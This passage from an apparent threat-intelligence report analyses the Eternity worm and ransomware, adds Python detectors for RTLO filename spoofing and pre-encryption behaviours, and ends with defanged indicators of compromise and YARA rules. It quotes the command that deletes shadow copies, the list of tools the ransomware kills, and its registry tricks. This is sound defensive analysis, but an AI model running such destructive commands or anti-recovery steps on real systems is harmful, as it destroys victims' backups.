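    for hit in find_suspicious_lines(INFECTED_OS_PY):
        print(hit)
```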

       Regarding the files with the following extensions, “.zip, .exe, .jar, .pdf, .docx, .xlsx, .pptx, .mp3, .mp4, .png”, the files
       are replaced with a sample contained in the resources of “DarkBuilder.dll”, a recurring library written by L1ghtM4n
       which helps while writing malicious code and is present in several malicious artifacts. This resource is called “JoinerStub”:
       the worm takes the original file and writes two resources, “” and “k”; the first contains
       the file, and the second contains 32 random bytes used to XOR the file. The same process applies to the payload.

                                                       Figure 39: Binding method

       The “JoinerStub” works in the following way: it iterates the resources, decrypts them, writes the decrypted sample in
       the “%temp%” directory and, if the sample extension is contained in the list
       “.exe, .com, .scr, .pif, .bat, .cmd, .vbs, .js, .py, .jar”, sleeps for 1 second and then executes it. Eternity
       Worm also spoofs the extension using the RTLO (Right-to-Left Override) technique.
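
A check for the RTLO extension spoofing described above, added here as an example that is not part of the report: it renders what the user would see, extracts the real extension and flags names where the two differ. The executable extension list is the one the report gives for the JoinerStub; the sample file names are constructed.

```python
"""Added example: tell a name's displayed form apart from its real extension
when it contains a Right-to-Left Override (U+202E)."""
from pathlib import Path

RLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE
PDF = "\u202c"   # POP DIRECTIONAL FORMATTING: ends an override
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}
# Extensions the JoinerStub executes after writing the file to %temp% (from the report).
EXECUTED_EXTENSIONS = {".exe", ".com", ".scr", ".pif", ".bat",
                       ".cmd", ".vbs", ".js", ".py", ".jar"}


def displayed_name(name: str) -> str:
    """Approximate how a file manager renders a name containing U+202E:
    everything after the override is drawn right-to-left until U+202C."""
    if RLO not in name:
        return name
    head, _, tail = name.partition(RLO)
    reversed_part, _, rest = tail.partition(PDF)
    return head + reversed_part[::-1] + rest


def inspect_filename(name: str) -> dict:
    """Return what the user sees, what the OS will actually run, and a verdict."""
    true_ext = Path(name).suffix.lower()        # suffix of the real, stored name
    shown = displayed_name(name)
    shown_ext = Path(shown).suffix.lower()
    has_bidi = any(c in BIDI_CONTROLS for c in name)
    return {
        "name": name,
        "displayed": shown,
        "true_extension": true_ext,
        "displayed_extension": shown_ext,
        "has_bidi_control": has_bidi,
        "executable": true_ext in EXECUTED_EXTENSIONS,
        # spoofed: a bidi control is present and the rendered extension differs
        "spoofed": has_bidi and shown_ext != true_ext,
    }


def find_spoofed(root: Path):
    """Walk a directory (Desktop, Documents, a removable drive...) and list spoofed names."""
    return [inspect_filename(p.name) for p in root.rglob("*")
            if p.is_file() and inspect_filename(p.name)["spoofed"]]


if __name__ == "__main__":
    # Constructed sample: stored as "report<RLO>fdp.exe", rendered as "reportexe.pdf".
    for n in ("report" + RLO + "fdp.exe", "report.pdf"):
        print(inspect_filename(n))
```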

       Eternity Ransomware
       Eternity Ransomware is the latest malware developed. It uses AES+RSA and is simple, but it has some interesting
       features.

                                                   Figure 40: Eternity Ransomware

       Once executed, it checks the arguments passed: if none are present, it creates a mutex from the hardcoded
       string “rbziwoehbr”; if “--debug” is passed instead, the mutex will not be created.

                                                      Figure 41: Mutex Creation

       Once the mutex has been created, the sample tries to avoid detection of its activities by disabling or killing
       specific tools, such as the Task Manager: it modifies the registry value
       “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr” and starts a thread that kills
       processes whose name contains one of these strings: “taskmgr, processHacker, procmon, procmon64, mmc”.


                                   Figure 42: Eternity Ransomware defensive capabilities

   The ransomware proceeds to inhibit system recovery by iterating the restore points and removing them with
   SRRemoveRestorePoint; it also deletes shadow copies by executing “vssadmin delete shadows /all /quiet”.

                                 Figure 43: Eternity Ransomware avoiding system recovery

   Then, it adds the registry key “HKCU\Software\Classes\.ecrp\shell\open\command” so that it is executed when the
   victim tries to open an encrypted file.


                                        Figure 44: Adding the extension in the registry

   Once the preliminary routines have been executed, the sample calls the method “GetFiles” to iterate the following
   directories:

       •    C:\Users\Admin\Pictures
       •    C:\Users\Admin\Documents
       •    C:\Users\Admin\Desktop
       •    C:\Users\Admin\AppData\Roaming\DropBox
       •    C:\Users\Admin\AppData\Roaming\OneDrive

   For each file, it calls the method “EncryptFile,” which performs these malicious operations:

       1.   Check whether the file exists and its extension isn’t the one used by the ransomware
       2.   Generate a random AES key using RNGCryptoServiceProvider
       3.   Protect the just-generated AES key with the RSA public key set earlier in the .cctor

    oXmacSoncuYi5Occov7K5P3m3IeOWpTMlE4hBUP/C8GswV4b+V7rh8dz3cJ6g+CTqrMy0letdgDMGRtTtimlL+wx5Lkfp3P
    sdlO7ka/Jby+nKIOrSv69WitdqsbMhy1YMQT0HxbUSQIMl/p+oX9lXYb5B0vvz7amErnR8ts7J0ap9mPQHfjJ9YJBeskFty4kOiEFlt0NoqdMjdXLDTPiYhY/q
    miOLmRx12C87TWhlmN0EyBJ7YBVFpMUfRbSK4H8DhHt9ZNh3W94uK//m6DaGtEoavw4QQ6qDOOlh4JGK2wuiwhFTNz+ihZQwQN601P1IIZAgF2lP
    eixNVX6KarD0Q==AQAB

   Code Snippet: Hardcoded Public key

       4.   Save the protected AES key in the registry key “HKCU\Software\Chrome\EncryptedKeys”

                                        Figure 45: Encrypted AES Keys in the registry
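
Detection logic for the preliminary routines described above (shadow copy deletion, DisableTaskMgr, the “.ecrp” handler and the “EncryptedKeys” registry store), added here as an example and not taken from the report. It runs over constructed host telemetry; the event field names (“type”, “cmdline”, “key”, “value_name”, “data”, “image”) and the sample handler command are assumptions of this example.

```python
"""Added example: match Eternity Ransomware's pre-encryption behaviours
over a list of constructed process/registry events."""
import re

# Each rule: name, event type it applies to, and a predicate on the event dict.
RULES = [
    ("shadow_copy_deletion", "process",
     lambda e: re.search(r"vssadmin(\.exe)?\s+delete\s+shadows",
                         e.get("cmdline", ""), re.I)),
    ("taskmgr_disabled", "registry",
     lambda e: e.get("key", "").lower().endswith(r"\policies\system")
               and e.get("value_name", "").lower() == "disabletaskmgr"
               and str(e.get("data", "")) == "1"),
    ("ecrp_open_handler", "registry",
     lambda e: r"\software\classes\.ecrp\shell\open\command" in e.get("key", "").lower()),
    ("encrypted_keys_store", "registry",
     lambda e: e.get("key", "").lower().endswith(r"\software\chrome\encryptedkeys")),
    # Weak on its own: users close Task Manager too. Only counts towards the threshold.
    ("analysis_tool_kill", "process_terminate",
     lambda e: any(t in e.get("image", "").lower()
                   for t in ("taskmgr", "processhacker", "procmon", "mmc"))),
]


def match_rules(events):
    """Return the set of rule names triggered by a list of event dicts."""
    matched = set()
    for e in events:
        for name, etype, pred in RULES:
            if e.get("type") == etype and pred(e):
                matched.add(name)
    return matched


def verdict(events, threshold=2):
    """Alert when at least `threshold` distinct behaviours are seen on one host;
    a single one (e.g. an admin running vssadmin) is only a weak signal."""
    hits = match_rules(events)
    return {"alert": len(hits) >= threshold, "matched": sorted(hits)}


# Constructed telemetry (not captured from a real infection). The handler
# command and the hive of the Policies key are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    {"type": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System",
     "value_name": "DisableTaskMgr", "data": 1},
    {"type": "registry", "key": r"HKCU\Software\Classes\.ecrp\shell\open\command",
     "value_name": "(Default)", "data": r"<placeholder path to the sample> %1"},
    {"type": "registry", "key": r"HKCU\Software\Chrome\EncryptedKeys",
     "value_name": "<key guid>", "data": "<rsa-wrapped aes key>"},
    {"type": "process_terminate", "image": r"C:\Windows\System32\Taskmgr.exe"},
]
BENIGN_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
    {"type": "registry", "key": r"HKCU\Software\Classes\.txt",
     "value_name": "", "data": "txtfile"},
]

if __name__ == "__main__":
    print(verdict(SAMPLE_EVENTS))   # alert True, five rules matched
    print(verdict(BENIGN_EVENTS))   # alert False, nothing matched
```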

   The targeted files are encrypted with the AES algorithm, then compressed with Deflate and converted
   to XML. The XML file contains two fields: “”, holding the ID of the key saved in the registry, and “”,
   holding the body of the encrypted file.

   The following picture describes the encryption routine:

                                   Figure 46: Eternity Ransomware encryption process


   Conclusion
   The actor is growing fast: in a few months, it was able to develop a large quantity of malicious code of a high
   technical level. This paper analyzed six components representing all the modern malware threats, starting from
   info-stealers, passing through miners and clippers, and arriving at ransomware and worms.

   During the hunting of the samples, we also found many packed samples, indicating that the gang has contacts with other
   criminal gangs in order to complicate analysis and limit AV detection.

   We won’t be surprised if one day we encounter this actor adopting the double extortion malicious business model.

   Threat Hunting and Threat Intelligence capabilities play a fundamental role in cyber defense activities. Indeed,
   having a detailed overview of a new threat actor helps the protection inside Yoroi’s Cyber Security Defense Center
   and of all the possible victims of similar attack attempts.

   Appendix

   Indicators of Compromise

   Jester Stealer:
    C2s:
      •    hxxp://jesterdcuxzbey4xvlwwheoecpltru5be2mzuk4w7a7nrhckdjjhrbyd.]onion/report/BlackFish

    Hashes:

     Proxy:
         •    6.173.214.]33:19797

   Merlynn Clipper:
      •    543cdfe5900ea81ff76fcc07999ea13ce7636939d010d6070a4db3215e946012
      •    dc8765321c2a0b3ce6fb26c284e8a98f831cf2a21cc49b24f017de396ef925d9
      •    F948fc3a5970cc6bc0b8b767ec89864daa2542eb09b32a9c952070c8d9ec3e99

   Trinity Miner:
      •    4ec2be2e2e2bc0dfdc9b8c741fbfab0432f045716d27c3b27ac16fad4cb47dab
      •    548c77e96af227a149b1526878eb071ca4d937f974681855dfac7169612706d0

   Lilith Botnet:
    C2s:
      •    hxxp://31.44.5.14:4545/gate/{0}/{1}

    Hashes:

   Eternity Ransomware:
      •    3ba098b717d6f9c52cc0ca4408dbde8e29886eb9103d1724b0d6930b431035c5

   Eternity Worm:
    Hashes:
      •    757eb1dc48fc181b770984905c3ec14c7be9c8f9bdf813108417e318479051f5
      •    77865f1b05c1f30363d9ba72a676894b3f4bd30641e0f3e50de2b68a8f10f6fe

    Payloads:
      •    hxxp://c.vinhall169.]com/w.exe
      •    hxxp://iqox575zftwvbkphhnbdxkg6pfrgcmeos3rebjwdt6ra2r73u5iq2jqd.]onion/shared/worm.exe
      •    hxxp://c.tronlink.]golf/sa/c.exe
      •    hxxp://c.tronlink.]golf/sa/w.exe

    Proxy:
       •   46.173.214.]33:19797

   Yara Rules
   rule jester_stealer_lilith_botnet
   {
     meta:
       description = "Rule for Jester Stealer"
       author = "Yoroi Malware ZLab"
       last_updated = "2022-05-02"
       tlp = "WHITE"
       category = "informational"
     strings:
       $stealer_botnet = {000511????12????0E0812????12????}
       $BSJB = {42534A42}
       $GUID = {2347554944}
     condition:
       all of them and uint16(0) == 0x5A4D
   }

   rule merlynn_clipper
   {
     meta:
       description = "Rule for Merlynn Clipper"
       author = "Yoroi Malware ZLab"
       last_updated = "2022-05-02"
       tlp = "WHITE"
       category = "informational"
     strings:
       $clipper_bytecode = {0203280900000628220000062A}
       $clipper2_bytecode = {0D001203284500000A066F4600000A6F4700000A1304}
       $BSJB = {42534A42}
       $GUID = {2347554944}
     condition:
       3 of them and uint16(0) == 0x5A4D
   }

   rule trinity_miner
   {
     meta:
       description = "Rule for Trinity Miner"
       author = "Yoroi Malware ZLab"
       last_updated = "2022-05-02"
       tlp = "WHITE"
       category = "informational"
     strings:
       $miner_bytecode = {14110A7E1000000A7E1000000A171A7E1000000A110B11071108280700000626}
       $BSJB = {42534A42}
       $GUID = {2347554944}
     condition:
       all of them and uint16(0) == 0x5A4D
   }

   rule eternity_worm
   {
     meta:
       description = "Rule for Eternity Worm"
       author = "Yoroi Malware ZLab"
       last_updated = "2022-05-02"
       tlp = "WHITE"
       category = "informational"
     strings:
       $1 = {03286E0200060A}
       $2 = {0628620200060B}
       $3 = {FE0C0000FE0C0100FE0C0000FE0C010093284100000A3A13000000FE0C0000FE0C010093284200000A380E000000FE0C0000FE0C010093284300000A9D}
       $4 = {FE1C4D00000158}
       $BSJB = {42534A42}
       $GUID = {2347554944}
     condition:
       3 of them and uint16(0) == 0x5A4D
   }

   rule eternity_ransomware
   {
     meta:
       description = "Rule for Eternity Ransomware"
       author = "Yoroi Malware ZLab"
       last_updated = "2022-05-02"
       tlp = "WHITE"
       category = "informational"
     strings:
       $bytecode = {022810010006066F5B01000628550100060B}
       $BSJB = {42534A42}
       $GUID = {2347554944}
     condition:
       all of them and uint16(0) == 0x5A4D
   }


                                                    Yoroi S.r.l.
                                    www.yoroi.company - info@yoroi.company

                                                Piazza Sallustio, 9
                                               00187 – Roma (RM)
                                               +39 (051) 0301005

                                Yoroi S.r.l. ® 2014-2021 – All rights reserved

      Yoroi S.r.l. is a company subject to management and coordination by Tinexta S.p.A.

          Yoroi ® is a registered trademark                                  Registration No.: 016792947
